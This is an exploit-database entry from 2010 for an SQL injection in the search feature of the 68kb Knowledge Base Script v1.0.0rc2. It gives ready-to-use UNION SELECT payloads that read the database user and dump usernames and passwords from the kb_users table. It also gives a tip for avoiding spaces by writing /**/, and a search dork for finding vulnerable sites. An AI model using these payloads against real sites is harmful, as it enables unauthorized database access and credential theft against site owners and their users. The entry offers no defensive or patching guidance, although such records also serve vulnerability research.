68kb Knowledge Base Script v1.0.0rc2 Search SQL Injection

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : 68kb Knowledge Base Script v1.0.0rc2 Search SQL Injection
# Published : 2010-03-28
# Author : Jelmer de Hen
# Previous Title : Joomla Component com_units SQL Injection Vulnerabilit
# Next Title : Date & Sex Vor und Rückw?rts Auktions System <= v2 Blind SQL Injection Exploit

Exploit Title: 68kb SQLI
Date: 2010-03-28
Author: Jelmer de Hen
Software Link: http://68kb.googlecode.com/files/68kb-v1.0.0rc2.zip
Version: v1.0.0rc2

Go to /search
and search for: %')/**/UNION/**/ALL/**/SELECT/**/1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15#
Don't use spaces in the injection because they change the sql query in a way which makes the injection nearly impossible; instead use /**/.
Here is an example how to select usernames and password if the default prefix of kb_ is used during the installation:
search for: %')/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/kb_users#

Dork: "Powered by 68kb"

-Jelmer de Hen